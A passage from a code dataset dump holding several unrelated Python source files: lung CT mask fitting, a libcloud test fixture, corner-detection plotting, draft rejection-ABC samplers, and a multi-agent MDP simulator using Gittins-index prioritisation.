val')\n f_right = np.polyfit(right_edge[:, 0], right_edge[:, 1], 2)\n f_r = np.poly1d(f_right)\n y_r = f_r(right_edge[:, 0])\n # plt.plot(left_edge[:, 0], left_edge[:, 1])\n # plt.plot(right_edge[:, 0], right_edge[:, 1]) \n # plt.savefig('lung_edgefit.png') \n top_1th = int(round(left_edge[0,0] + (left_edge[-1,0] - left_edge[0,0]) / 3))\n top_2th = int(round(right_edge[0,0] + (right_edge[-1,0] - right_edge[0,0]) *2/ 3))\n left_edge1th = copy.deepcopy(left_edge)\n right_edge1th = copy.deepcopy(right_edge)\n left_edge2th = copy.deepcopy(left_edge)\n right_edge2th = copy.deepcopy(right_edge)\n\n for i in range(lungs_prespective.shape[1]):\n if lungs_prespective[0, i] == 1 and lungs_prespective[top_1th, i+1] == 0:\n w_l = int(sum(lungs_prespective[top_1th, :i]) / 3)\n left_edge1th[:, 1] = y_l + w_l\n left_edge2th[:, 1] = y_l + 2*w_l\n w_r = int(sum(lungs_prespective[top_1th, i+1:]) / 3)\n right_edge1th[:, 1] = y_r - w_r\n right_edge2th[:, 1] = y_r - 2*w_r\n break\n if lungs_prespective[top_2th, i] == 1 and lungs_prespective[top_2th, i+1] == 0:\n w_l = int(sum(lungs_prespective[top_2th, :i]) / 3)\n left_edge1th[:, 1] = y_l + w_l\n left_edge2th[:, 1] = y_l + 2*w_l\n w_r = int(sum(lungs_prespective[top_2th, i+1:]) / 3)\n right_edge1th[:, 1] = y_r - w_r\n right_edge2th[:, 1] = y_r - 2*w_r\n break\n plt.plot(right_edge[:, 0], right_edge[:, 1]) \n plt.plot(right_edge1th[:, 0], right_edge1th[:, 1]) \n plt.plot(right_edge2th[:, 0], right_edge2th[:, 1]) \n plt.plot(left_edge[:, 0], left_edge[:, 1]) \n plt.plot(left_edge1th[:, 0], left_edge1th[:, 1]) \n plt.plot(left_edge2th[:, 0], left_edge2th[:, 1]) \n plt.savefig('lung_edgefit.png') \n\n\ndef fun(x):\n round(x, 2)\n if x>=0: return '+'+str(x)\n else: return str(x)\n\ndef fit_surface(X, Y, Z):\n n = len(X)\n sigma_x = 0\n for i in X : sigma_x += i\n sigma_y = 0\n for i in Y: sigma_y += i\n sigma_z = 0\n for i in Z: sigma_z += i\n sigma_x2 = 0\n for i in X: sigma_x2 += i * i\n sigma_y2 = 0\n for i in Y: sigma_y2 += i * i\n sigma_x3 = 0\n for i in X: sigma_x3 += i * i * i\n sigma_y3 = 0\n for i in Y: sigma_y3 += i * i * i\n sigma_x4 = 0\n for i in X: sigma_x4 += i * i * i * i\n sigma_y4 = 0\n for i in Y: sigma_y4 += i * i * i * i\n sigma_x_y = 0\n for i in range(n):\n sigma_x_y += X[i] * Y[i]\n # print(sigma_xy)\n sigma_x_y2 = 0\n for i in range(n): sigma_x_y2 += X[i] * Y[i] * Y[i]\n sigma_x_y3 = 0\n for i in range(n): sigma_x_y3 += X[i] * Y[i] * Y[i] * Y[i]\n sigma_x2_y = 0\n for i in range(n): sigma_x2_y += X[i] * X[i] * Y[i]\n sigma_x2_y2 = 0\n for i in range(n): sigma_x2_y2 += X[i] * X[i] * Y[i] * Y[i]\n sigma_x3_y = 0\n for i in range(n): sigma_x3_y += X[i] * X[i] * X[i] * Y[i]\n sigma_z_x2 = 0\n for i in range(n): sigma_z_x2 += Z[i] * X[i] * X[i]\n sigma_z_y2 = 0\n for i in range(n): sigma_z_y2 += Z[i] * Y[i] * Y[i]\n sigma_z_x_y = 0\n for i in range(n): sigma_z_x_y += Z[i] * X[i] * Y[i]\n sigma_z_x = 0\n for i in range(n): sigma_z_x += Z[i] * X[i]\n sigma_z_y = 0\n for i in range(n): sigma_z_y += Z[i] * Y[i]\n # print(\"-----------------------\")\n # 给出对应方程的矩阵形式\n a = np.array([[sigma_x4, sigma_x3_y, sigma_x2_y2, sigma_x3, sigma_x2_y, sigma_x2],\n [sigma_x3_y, sigma_x2_y2, sigma_x_y3, sigma_x2_y, sigma_x_y2, sigma_x_y],\n [sigma_x2_y2, sigma_x_y3, sigma_y4, sigma_x_y2, sigma_y3, sigma_y2],\n [sigma_x3, sigma_x2_y, sigma_x_y2, sigma_x2, sigma_x_y, sigma_x],\n [sigma_x2_y, sigma_x_y2, sigma_y3, sigma_x_y, sigma_y2, sigma_y],\n [sigma_x2, sigma_x_y, sigma_y2, sigma_x, sigma_y, n]])\n b = np.array([sigma_z_x2, sigma_z_x_y, sigma_z_y2, sigma_z_x, sigma_z_y, sigma_z])\n # 高斯消元解线性方程\n res = np.linalg.solve(a, b)\n\n return res\n\n\ndef lung_9mask(lung9, edges):\n # fig = plt.figure() # 建立一个空间\n # ax = fig.add_subplot(111, projection='3d') # 3D坐标\n res_equation = []\n for i in range(2):\n # i = 1\n edge = edges[i]\n\n\n edge1th = np.array(edge[0])\n edge2th = np.array(edge[1])\n edge3th = np.array(edge[2])\n\n X, Y, Z = edge1th[:, 0], edge1th[:, 1], edge1th[:, 2]\n X1, Y1, Z1 = edge2th[:, 0], edge2th[:, 1], edge2th[:, 2]\n X2, Y2, Z2 = edge3th[:, 0], edge3th[:, 1], edge3th[:, 2]\n\n res = fit_surface(X, Y, Z)\n res1 = fit_surface(X1, Y1, Z1)\n res2 = fit_surface(X2, Y2, Z2)\n res_equation.append([res, res1, res2])\n print(\"z=%.6s*x^2%.6s*xy%.6s*y^2%.6s*x%.6s*y%.6s\" % (\n fun(res[0]), fun(res[1]), fun(res[2]), fun(res[3]), fun(res[4]), fun(res[5])))\n x_start, x_end = min(X), max(X)\n y_start, y_end = min(Y), max(Y)\n x_1th, x_2th = round((x_end - x_start) / 3 + x_start), round(2 * (x_end - x_start) / 3 + x_start)\n ux = np.linspace(x_start, x_end, x_end - x_start + 1) # 创建一个等差数列\n uy = np.linspace(y_start, y_end, y_end - y_start + 1) # 创建一个等差数列\n x, y = np.meshgrid(ux, uy)\n\n z = res[0] * x * x + res[1] * x * y + res[2] * y * y + res[3] * x + res[4] * y + res[5]\n z1 = res1[0] * x * x + res1[1] * x * y + res1[2] * y * y + res1[3] * x + res1[4] * y + res1[5]\n z2 = res2[0] * x * x + res2[1] * x * y + res2[2] * y * y + res2[3] * x + res2[4] * y + res2[5]\n x_all, y_all, z_all, z1_all, z2_all = x.flatten('F').astype(int), (y.flatten('F')).astype(int), \\\n np.round(z.flatten('F')).astype(int), np.round(z1.flatten('F')).astype(int), \\\n np.round(z2.flatten('F')).astype(int)\n # plt.scatter(y_all, z_all, s=1)\n # plt.scatter(y_all, z1_all, s=1)\n # plt.scatter(y_all, z2_all, s=1)\n # plt.show()\n z_all[z_all<0] = 0\n z1_all[z1_all<0] = 0\n z2_all[z2_all<0] = 0\n mid_line = int(lung9.shape[3]/2)\n # left\n if i == 0:\n for id, x_i in enumerate(x_all):\n if x_i < x_1th:\n lung9[0, x_i, y_all[id], z_all[id]:z1_all[id]] = 1\n lung9[1, x_i, y_all[id], z1_all[id]:z2_all[id]] = 1\n lung9[2, x_i, y_all[id], z2_all[id]:mid_line] = 1\n elif x_i < x_2th:\n lung9[3, x_i, y_all[id], z_all[id]:z1_all[id]] = 1\n lung9[4, x_i, y_all[id], z1_all[id]:z2_all[id]] = 1\n lung9[5, x_i, y_all[id], z2_all[id]:mid_line] = 1\n else:\n lung9[6, x_i, y_all[id], z_all[id]:z1_all[id]] = 1\n lung9[7, x_i, y_all[id], z1_all[id]:z2_all[id]] = 1\n lung9[8, x_i, y_all[id], z2_all[id]:mid_line] = 1\n\n # for j in range(11, 34):\n # img_arr = np.zeros_like(lung9[0, 0, :, :])\n # for i in range(9):\n # img_arr = lung9[i, j, :, :] * 255 * (1+i) / 9 + img_arr\n # img = Image.fromarray(img_arr)\n # # img.save(f'./res_lung9/left_{i}.jpg')\n # img.convert('RGB').save(f'./res_lung9/left_{j}.jpg')\n # right\n if i == 1:\n for id, x_i in enumerate(x_all):\n if x_i < x_1th:\n lung9[9, x_i, y_all[id], z1_all[id]:z_all[id]] = 1\n lung9[9 + 1, x_i, y_all[id], z2_all[id]:z1_all[id]] = 1\n lung9[9 + 2, x_i, y_all[id], mid_line:z2_all[id]] = 1\n elif x_i < x_2th:\n lung9[9 + 3, x_i, y_all[id], z1_all[id]:z_all[id]] = 1\n lung9[9 + 4, x_i, y_all[id], z2_all[id]:z1_all[id]] = 1\n lung9[9 + 5, x_i, y_all[id], mid_line:z2_all[id]] = 1\n else:\n lung9[9 + 6, x_i, y_all[id], z1_all[id]:z_all[id]] = 1\n lung9[9 + 7, x_i, y_all[id], z2_all[id]:z1_all[id]] = 1\n lung9[9 + 8, x_i, y_all[id], mid_line:z2_all[id]] = 1\n return lung9, res_equation\n\ndef features_lung9(labels_mask, lung9, lungs_seg):\n features2lung9 = []\n label_num = len(labels_mask)\n for i in range(label_num):\n label_mask = labels_mask[i]\n feature2lung9 = []\n for i in range(18):\n casue_lung9 = lung9[i] * lungs_seg * label_mask\n lung_lab = measure.label(casue_lung9, connectivity=2)\n feature2lung9.append(np.max(lung_lab))\n features2lung9.append(feature2lung9)\n return features2lung9 #, lung9 ????210717\n\n\ndef imfill(img):\n output = ndimage.binary_fill_holes(img).astype(bool)\n return output\n\ndef closeopration(img):\n kernel = np.ones((5, 5), np.uint8)\n iclose = cv2.morphologyEx(img, cv2.MORPH_CLOSE, kernel)\n return iclose\n\n","repo_name":"Rsolut1on/MP_CTscore","sub_path":"tools_feature.py","file_name":"tools_feature.py","file_ext":"py","file_size_in_byte":11376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70924547771","text":"from libcloud.storage.drivers.dummy import DummyFileObject as BaseDummyFileObject\n\n\nclass DummyFile(BaseDummyFileObject):\n \"\"\"Add size just for test purpose.\"\"\"\n\n def __init__(self, yield_count=5, chunk_len=10):\n super().__init__(yield_count, chunk_len)\n self.size = len(self)\n self.filename = \"dummy-file\"\n self.content_type = \"application/octet-stream\"\n","repo_name":"jowilf/sqlalchemy-file","sub_path":"tests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":389,"program_lang":"python","lang":"en","doc_type":"code","stars":69,"dataset":"github-code","pt":"78"} +{"seq_id":"32530930560","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef plot_corner_responses(shi_tomasi, harris, img_id):\n fig, (ax1, ax2) = plt.subplots(1, 2)\n ax1.imshow(shi_tomasi.astype(np.float32))\n ax1.set_title(\"Shi-Tomasi\")\n ax2.imshow(harris.astype(np.float32))\n ax2.set_title(\"Harris\")\n fig.suptitle(\"Corner detection responses\" + img_id)\n plt.show()\n\n\ndef plot_harris_corners(image, corners_coords):\n plt.imshow(image, cmap='gray', vmin=0, vmax=255)\n plt.scatter(corners_coords[1], corners_coords[0], marker='+', c='r', s=4)\n plt.title(\"Harris k-best corners\")\n plt.show()\n\n","repo_name":"yardenas/ethz-vision-algorithms","sub_path":"point_tracker/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"36405340249","text":"import numpy as np\n\n\"\"\"\nPathos, a python parallel processing library from caltech.\n\nUnlike Python's default multiprocessing library, pathos provides a more flexible\nparallel map which can apply almost any type of function --- including lambda\nfunctions, nested functions, and class methods --- and can easily handle\nfunctions with multiple arguments.\n\nIn author’s own words:\n\n\"Pathos is a framework for heterogenous computing.\nIt primarily provides the communication mechanisms for configuring\nand launching parallel computations across heterogenous resources\"\n\nmultiprocess.Pool is a fork of multiprocessing.Pool, with the only difference\nbeing that multiprocessing uses pickle and multiprocess uses dill\n\nThe preferred interface is pathos.pools.ProcessPool\n\nThe pathos-wrapped pool is pathos.pools.ProcessPool (and the old interface\nprovides it at pathos.multiprocessing.Pool).\n\ntqdm for pathos: https://pypi.org/project/p-tqdm/\n\n\"\"\"\n\n\n\"\"\"\nfrom pathos.multiprocessing import ProcessingPool as Pool\n\n\tclass myClass:\n\t\tdef __init__(self):\n\t\t\tpass\n\n\t\tdef square(self, x):\n\t\t\treturn x*x\n\n\t\tdef run(self, inList):\n\t\t\tpool = Pool().map\n\t\t\tresult = pool(self.square, inList)\n\t\t\treturn result\n\n\tif __name__== '__main__' :\n\t\tm = myClass()\n\t\tprint m.run(range(10))\n\"\"\"\n\n\nclass RejABC:\n\n def __init__(self, observation, simulator, priors, distance='l2',\n rng=np.random.RandomState, seed=None):\n\n super().__init__(\n observation=observation,\n simulator=simulator,\n priors=priors,\n distance=distance,\n rng=rng,\n seed=seed\n )\n\n self._n_sims = 0\n\n def sample(self, n_samples, epsilon=None, n_jobs=None, log=True):\n \"\"\"\n n_jobs: int, default: None\n The maximum number of concurrently running jobs, such as the\n number of Python worker processes when backend=”multiprocessing” or\n the size of the thread-pool when backend=”threading”. If -1 all\n CPUs are used. If 1 is given, no parallel computing code is used\n at all, which is useful for debugging. For n_jobs below -1,\n (n_cpus + 1 + n_jobs) are used. Thus for n_jobs = -2, all CPUs but\n one are used. None is a marker for ‘unset’ that will be interpreted\n as n_jobs=1 (sequential execution) unless the call is performed\n under a parallel_backend context manager that sets another value\n for n_jobs.\n \"\"\"\n\n samples = self._sample(n_samples)\n return n_samples\n\n def _sample(self, n_samples):\n samples = []\n\n for _ in range(n_samples):\n samples.append(self._draw_posterior_sample())\n\n return samples\n\n def _draw_posterior_sample(self):\n sample = None\n while sample is None:\n thetas = [prior.rvs(rng=self._rng, seed=self._seed + self._n_sims)\n for prior in self._priors]\n sim = self._simulator(*thetas)\n self._n_sims += 1\n distance = self._distance(self._obs, sim)\n if distance <= self._epsilon:\n sample = thetas\n return sample\n\n##\n\n\nclass ApproximateBayesianComputation(Procedure):\n r\"\"\"\"\"\"\n\n def __init__(self, simulator, prior, summary, acceptor):\n super(ApproximateBayesianComputation, self).__init__()\n # Main classical ABC properties.\n self.acceptor = acceptor\n self.prior = prior\n self.simulator = simulator\n self.summary = summary\n\n def _register_events(self):\n # TODO Implement.\n pass\n\n def _draw_posterior_sample(self, summary_observation):\n sample = None\n\n while sample is None:\n prior_sample = self.prior.sample()\n x = self.simulator(prior_sample)\n s = self.summary(x)\n if self.acceptor(s, summary_observation):\n sample = prior_sample.unsqueeze(0)\n\n return sample\n\n def sample(self, observation, num_samples=1):\n samples = []\n\n summary_observation = self.summary(observation)\n for _ in range(num_samples):\n samples.append(self._draw_posterior_sample(summary_observation))\n samples = torch.cat(samples, dim=0)\n\n return samples\n\n\n\"\"\"\nOLD\n\n\"\"\"\n\n\nclass RejectionABC(ABCBase):\n \"\"\"Rejection ABC.\n \"\"\"\n\n def __init__(self, observation, simulator, priors, distance='l2',\n rng=np.random.RandomState, seed=None):\n \"\"\"\n simulator : callable\n simulator model\n summary_calculator : callable, defualt None\n summary statistics calculator. If None, simulator should output\n sum stat\n distance : str\n Can be a custom function or one of l1, l2, mse\n distance_metric : callable\n discrepancy measure\n \"\"\"\n\n # self._obs = observation\n # self._simulator = simulator # model simulator function\n # self._priors = priors\n # self._distance = distance # distance metric function\n super().__init__(\n observation=observation,\n simulator=simulator,\n priors=priors,\n distance=distance,\n rng=rng,\n seed=seed\n )\n\n def __call__(self, num_simulations, epsilon, lra=False):\n journal = self.sample(num_simulations, epsilon, lra)\n return journal\n\n def sample(self, n_sims=None, n_samples=None, epsilon=0.5, log=True):\n \"\"\"\n add **kwargs for simulator call?\n\n Pritchard et al. (1999) algorithm\n\n n_samples: integer\n Number of samples to generate\n\n epsilon : {float, str}\n Default 'adaptive'\n\n Notes\n -----\n Specifying the 'n_simulations' is generally a faster computation than\n specifying 'n_samples', but with the trade-off that the number of\n posterior samples will be at the mercy of the configuration\n\n lra bool, Whether to run linear regression adjustment as in Beaumont et al. 2002\n \"\"\"\n\n self._t0 = time.time()\n\n _inference_scheme = \"Rejection ABC\"\n\n self._log = log\n self._epsilon = epsilon\n\n if self._log:\n self.logger = setup_logger(self.__class__.__name__)\n self.logger.info(f\"Initialize {_inference_scheme} sampler.\")\n\n if n_sims is None and n_samples is None:\n msg = (\"One of 'n_sims' or 'n_samples' must be specified.\")\n raise ValueError(msg)\n if n_sims is not None and n_samples is not None:\n msg = (\"Cannot specify both 'n_sims' and 'n_samples'.\")\n raise ValueError(msg)\n\n # initialize journal\n self._journal = Journal()\n self._journal._start_journal(log, self._simulator, self._priors,\n _inference_scheme, self._distance, n_sims, epsilon)\n\n if n_sims is not None:\n if isinstance(n_sims, int):\n # call rejection loop\n self._sampler_n_sims(n_sims)\n else:\n msg = (\"The number of simulations must be given as an integer.\")\n raise TypeError(msg)\n\n if n_samples is not None:\n if isinstance(n_samples, int):\n # call rejection loop\n self._sampler_n_samples(n_samples)\n else:\n msg = (\"The number of samples must be given as an integer.\")\n raise TypeError(msg)\n\n return self._journal\n\n def _sampler_n_samples(self, n_samples):\n \"\"\"Sampling loop for specified number of posterior samples\"\"\"\n\n n_sims = 0\n n_accepted = 0\n\n if self._log:\n self.logger.info(\"Run sampler.\")\n pbar = tqdm(total=n_samples,\n desc=\"Sampling progress\",\n position=0,\n leave=True,\n colour='green')\n\n while n_accepted < n_samples:\n if self._seed is None:\n thetas = [prior.rvs(rng=self._rng) for prior in self._priors]\n else:\n thetas = [prior.rvs(rng=self._rng, seed=self._seed + n_sims)\n for prior in self._priors]\n sim = self._simulator(*thetas)\n n_sims += 1\n distance = self._distance(self._obs, sim)\n if distance <= self._epsilon:\n if self._log:\n pbar.update(1)\n n_accepted += 1\n self._journal._add_accepted_parameters(thetas)\n self._journal._add_distance(distance)\n self._journal._add_rel_distance(sim - self._obs)\n self._journal._add_threshold(self._epsilon)\n self._journal._add_sumstats(sim)\n\n if self._log:\n pbar.close()\n self.logger.info(f\"Sampler ran {n_sims} simulations to \"\n + f\"obtain {n_accepted} samples.\")\n self._journal._processing_msg()\n\n t1 = time.time() - self._t0\n self._journal._process_inference(n_sims, n_accepted, t1)\n\n if self._log:\n self._journal._done_msg()\n","repo_name":"nicolossus/pylfi","sub_path":"_dev/inferences/rej_abc_dev.py","file_name":"rej_abc_dev.py","file_ext":"py","file_size_in_byte":9200,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"7517607788","text":"import heapq\nimport queue as Q\nimport numpy as np\nfrom collections import Counter\nfrom abc import abstractmethod\n\nimport random\n\nimport Actor.Prioritizer as Pr\nfrom Critic.Critic import CriticFactory\nfrom Framework.Inputs import ProblemInput, AgentSimulationInput\nfrom Framework.PrioritizedObject import PrioritizedObject\nimport Simulator.SimulatorBasics as sb\nimport MDPModel.MDPBasics as mdp\n\n\nclass Simulator:\n \"\"\" Abstract class which tries to learn optimal policy via Q-Learning, based on observations \"\"\"\n\n def __init__(self, sim_input: ProblemInput):\n self.model: sb.SimulatedModel = sim_input.MDP_model\n self.evaluation_type = sim_input.eval_type\n self.gamma = sim_input.MDP_model.MDP.gamma\n self.epsilon = sim_input.epsilon\n self.evaluated_model = mdp.EvaluatedModel()\n\n self.critic = CriticFactory.generate(model=self.model, evaluator_type=self.evaluation_type)\n state_num = self.model.n\n sb.SimulatedState.action_num = self.model.actions\n self.evaluated_model.ResetData(self.model.n, self.model.actions)\n self.policy = [0] * state_num\n self.model.calc_policy_data(self.policy)\n\n # Initiate static variables\n sb.SimulatedState.policy = self.policy\n sb.SimulatedState.V_hat_vec = self.evaluated_model.V_hat\n\n mdp.StateActionPair.Q_hat_mat = self.evaluated_model.Q_hat\n mdp.StateActionPair.TD_error_mat = self.evaluated_model.TD_error\n mdp.StateActionPair.r_hat_mat = self.evaluated_model.r_hat\n mdp.StateActionPair.P_hat_mat = self.evaluated_model.P_hat\n mdp.StateActionPair.visitations_mat = self.evaluated_model.visitations\n\n def improve_policy(self, sim_input, **kwargs):\n \"\"\" Choose best action per state, based on Q value\"\"\"\n for state in self.model.states:\n state.policy_action = state.best_action.action\n\n self.model.calc_policy_data(self.policy)\n\n def get_action_results(self, state_action: mdp.StateActionPair):\n \"\"\" simulates desired action, and returns next_state, reward \"\"\"\n next_state, reward = self.model.MDP.sample_state_action(state_action.state.idx, state_action.action)\n return self.model.states[next_state], reward\n\n def update_model(self, current_state_action, next_state, reward):\n def update_v():\n future_v = current_state_action.P_hat @ self.evaluated_model.V_hat\n current_state_action.state.V_hat = current_state_action.r_hat + self.gamma * future_v\n\n def update_q():\n a_n = (current_state_action.visitations + 1) ** -0.7\n current_state_action.TD_error = reward + self.gamma * max(\n next_state.actions).Q_hat - current_state_action.Q_hat\n current_state_action.Q_hat += (a_n * current_state_action.TD_error)\n\n def update_p():\n curr_num_of_tran = current_state_action.P_hat * current_state_action.visitations\n curr_num_of_tran[next_state.idx] += 1\n\n new_est_p_row = curr_num_of_tran / (current_state_action.visitations + 1)\n current_state_action.P_hat = new_est_p_row\n\n def update_reward():\n current_state_action.r_hat = (current_state_action.r_hat * current_state_action.visitations + reward) / (\n current_state_action.visitations + 1)\n\n update_reward()\n update_p()\n update_v()\n update_q()\n current_state_action.UpdateVisits()\n\n def sample_state_action(self, agent_type, state_action: mdp.StateActionPair):\n next_state, reward = self.get_action_results(state_action)\n if agent_type == 'regular':\n self.update_model(state_action, next_state, reward)\n\n return reward, next_state\n\n def simulate(self, sim_input):\n self.init_simulation(sim_input)\n for i in range(int(sim_input.steps / sim_input.temporal_extension)):\n self.simulate_one_step(agents_to_run=sim_input.agents_to_run,\n temporal_extension=sim_input.temporal_extension,\n iteration_num=i,\n T_board=sim_input.T_board)\n if i % sim_input.grades_freq == 0:\n self.improve_policy(sim_input, iteration_num=i)\n if i % sim_input.evaluate_freq == 0: # sim_input.evaluate_freq - 1:\n self.sim_evaluate(trajectory_len=sim_input.trajectory_len,\n running_agents=sim_input.agents_to_run,\n gamma=self.gamma)\n if i % 1000 == 0: print('1000 down')\n # if i % sim_input.reset_freq == 0: # sim_input.reset_freq - 1:\n # self.Reset()\n\n return self.critic\n\n def reset(self):\n pass\n\n def init_simulation(self, sim_input):\n pass\n\n @abstractmethod\n def simulate_one_step(self, agents_to_run, **kwargs):\n pass\n\n def sim_evaluate(self, **kwargs):\n self.critic.critic_evaluate(initial_state=self.raffle_initial_state(), good_agents=50,\n chain_num=self.model.MDP.chain_num,\n active_chains_ratio=self.model.MDP.active_chains_ratio,\n active_chains=self.model.MDP.get_active_chains(),\n **kwargs)\n\n def raffle_initial_state(self):\n return np.random.choice(self.model.states, p=self.model.MDP.init_prob)\n\n @property\n def opt_policy(self):\n return self.model.MDP.opt_policy\n\n\nclass AgentSimulator(Simulator):\n def __init__(self, sim_input: ProblemInput):\n super().__init__(sim_input)\n self.agents_num = sim_input.agent_num\n self.init_prob = self.model.init_prob\n self.agents = Q.PriorityQueue()\n self.optimal_agents = self.generate_optimal_agents(sim_input.agent_num)\n self.reset_agents(self.agents_num)\n\n self.graded_states = {state.idx: (state.idx, random.random()) for state in self.model.states}\n\n def generate_optimal_agents(self, agents_num):\n agents_list = []\n good_agents = 0\n while good_agents < agents_num:\n new_agent = sb.Agent(100 + good_agents, self.raffle_initial_state(), agent_type='optimal')\n next_state, _ = self.get_action_results(self.choose_action(new_agent.curr_state, new_agent.type))\n if next_state.chain not in self.model.MDP.get_active_chains():\n continue\n new_agent.curr_state = next_state\n agents_list.append(new_agent)\n good_agents += 1\n\n return agents_list\n\n def sim_evaluate(self, **kwargs):\n kwargs['agents_reward'] = list(map(lambda agent: agent.object.get_online_and_zero(), self.agents.queue))\n kwargs['optimal_agents_reward'] = list(map(lambda agent: agent.get_online_and_zero(), self.optimal_agents))\n super().sim_evaluate(**kwargs)\n\n def choose_init_state(self):\n return np.random.choice(self.model.states, p=self.init_prob)\n\n def get_stats_for_prioritizer(self, method, parameter):\n if parameter is None:\n return None, None\n\n if method == 'model_free':\n return self.model.MDP, self.evaluated_model.TD_error if parameter == 'error' else None\n\n if parameter == 'reward':\n return self.evaluated_model.P_hat, self.evaluated_model.r_hat\n if parameter == 'error':\n return self.evaluated_model.P_hat, abs(self.evaluated_model.TD_error)\n if parameter == 'v_f':\n return self.evaluated_model.P_hat, self.evaluated_model.V_hat\n if parameter == 'ground_truth':\n return self.model.MDP.P, np.transpose(self.model.MDP.expected_r)\n\n def improve_policy(self, sim_input, **kwargs):\n \"\"\"\n :param sim_input: simulation parameters\n :param kwargs: must contain current iteration number, for reincarnation\n :effect: calculate new indexes for all sates, and grade agents accordingly\n \"\"\"\n super().improve_policy(sim_input)\n\n p, r = self.get_stats_for_prioritizer(sim_input.method, sim_input.parameter)\n prioritizer = sim_input.prioritizer(states=self.model.states,\n policy=self.policy,\n p=p,\n r=r,\n temporal_extension=sim_input.temporal_extension,\n discount_factor=sim_input.gittins_discount,\n trajectory_num=sim_input.trajectory_num,\n max_trajectory_len=sim_input.max_trajectory_len,\n parameter=sim_input.parameter)\n self.graded_states = prioritizer.grade_states()\n\n self.regrade_all_agents(kwargs['iteration_num'], sim_input.grades_freq)\n\n def reincarnate_agent(self, agent, iteration_num, grades_freq):\n pass\n # if iteration_num - agent.last_activation > 10000 * grades_freq:\n # agent.last_activation = iteration_num\n # agent.curr_state = self.RaffleInitialState()\n\n def regrade_all_agents(self, iteration_num, grades_freq):\n \"\"\"invoked after states re-prioritization. Replaces queue\"\"\"\n new_queue = Q.PriorityQueue()\n while self.agents.qsize() > 0:\n agent = self.agents.get().object\n self.reincarnate_agent(agent, iteration_num, grades_freq)\n new_queue.put(self.grade_agent(agent))\n\n self.agents = new_queue\n\n def grade_agent(self, agent):\n \"\"\" Agents in non-visited states / initial states are prioritized\"\"\"\n state = agent.curr_state.idx\n score = (0, -np.inf) if state in self.model.init_states_idx else self.graded_states[state]\n return PrioritizedObject(agent, score)\n\n def simulate_one_step(self, agents_to_run, **kwargs):\n \"\"\" Find top-priority agents, and activate them for a single step\"\"\"\n possible_states = [agent.object.curr_state.idx for agent in self.agents.queue]\n\n agents_list = [self.agents.get().object for _ in range(agents_to_run)]\n activated_states = [agent.curr_state.idx for agent in agents_list]\n\n self.optimal_agents = self.optimal_agents[:agents_to_run]\n\n for agent in agents_list + self.optimal_agents:\n for _ in range(kwargs['temporal_extension']):\n self.simulate_agent(agent, **kwargs)\n if agent.type == 'regular':\n self.critic.update(agent.chain, agent.curr_state.idx)\n\n if agent.type == 'regular':\n self.agents.put(self.grade_agent(agent))\n\n return possible_states, activated_states\n\n def choose_action(self, state: sb.SimulatedState, agent_type, t_board=0):\n if agent_type == 'optimal':\n return state.actions[self.opt_policy[state.idx]]\n\n if agent_type == 'regular':\n min_visits, min_action = state.min_visitations\n if min_visits < t_board:\n return state.actions[min_action]\n\n return state.policy_action if random.random() > self.epsilon else np.random.choice(state.actions)\n\n def simulate_agent(self, agent: sb.Agent, iteration_num, **kwargs):\n \"\"\"simulate one action of an agent, and re-grade it, according to it's new state\"\"\"\n\n state_action = self.choose_action(agent.curr_state, agent.type, kwargs['T_board'])\n\n agent.last_activation = iteration_num\n reward, next_state = self.sample_state_action(agent.type, state_action)\n agent.update(reward, next_state)\n\n def reset(self):\n self.reset_agents(self.agents.qsize())\n\n def reset_agents(self, agents_num):\n self.agents = Q.PriorityQueue()\n for i in range(agents_num):\n init_state = self.choose_init_state()\n self.agents.put(PrioritizedObject(sb.Agent(i, init_state), (-np.inf, 0)))\n\n @property\n def agents_location(self):\n chains_count = Counter([agent.object.chain for agent in self.agents.queue])\n return chains_count\n\n\nclass GTAgentSimulator(AgentSimulator):\n def __init__(self, sim_input: ProblemInput):\n self.bad_activated_states = 0\n self.gittins = {}\n self.indexes_vec = []\n self.gt_indexes_vec = []\n super().__init__(sim_input)\n\n def simulate(self, sim_input):\n return super().simulate(sim_input), self.indexes_vec[1:], self.gt_indexes_vec[1:]\n\n def sim_evaluate(self, **kwargs):\n kwargs['bad_activated_states'] = self.bad_activated_states\n super().sim_evaluate(**kwargs)\n\n def simulate_one_step(self, agents_to_run, **kwargs):\n possible_states, activated_states = super().simulate_one_step(agents_to_run, **kwargs)\n\n wrongly_activated = 0\n states_order = [(self.gittins[state][0], state) for state in possible_states]\n heapq.heapify(states_order)\n optimal_states = [heapq.heappop(states_order)[1] for _ in range(len(activated_states))]\n\n optimal_counter = Counter(optimal_states)\n chosen_counter = Counter(activated_states)\n\n # a list of states that are optimal, but weren't activated by the prioritizer\n optimal_not_activated = [self.gittins[state][1] for state in (optimal_counter - chosen_counter).elements()]\n\n # iterate through states that were activated, but aren't optimal.\n # If a sub-optimal activated state's gittins index is equal to one from the optimal not activated,\n # choosing it was not a mistake\n for state in (chosen_counter - optimal_counter).elements():\n state_grade = self.gittins[state][1]\n if state_grade in optimal_not_activated:\n optimal_not_activated.remove(state_grade)\n else:\n wrongly_activated += 1\n\n self.bad_activated_states += wrongly_activated\n\n def calc_index_vec(self, sim_input):\n self.indexes_vec.append([self.graded_states[key][1] for key in range(self.model.MDP.n)])\n\n p_gt, r_gt = self.get_stats_for_prioritizer('gittins', sim_input.parameter)\n gt_prioritizer = Pr.GittinsPrioritizer(states=self.model.states,\n policy=self.policy,\n p=p_gt,\n r=r_gt,\n temporal_extension=sim_input.temporal_extension,\n discount_factor=sim_input.gittins_discount)\n\n self.gittins = gt_prioritizer.grade_states()\n self.gt_indexes_vec.append([self.gittins[key][1] for key in range(self.model.MDP.n)])\n\n def init_simulation(self, sim_input):\n self.calc_index_vec(sim_input)\n\n def improve_policy(self, sim_input, **kwargs):\n super().improve_policy(sim_input, **kwargs)\n self.calc_index_vec(sim_input)\n\n\ndef SimulatorFactory(new_mdp: sb.MDPModel, sim_params, gt_compare):\n if gt_compare:\n simulator = GTAgentSimulator\n else:\n simulator = AgentSimulator\n\n return simulator(ProblemInput(sim_params, sb.SimulatedModel(new_mdp)))\n\n\ndef SimInputFactory(method_type, parameter, 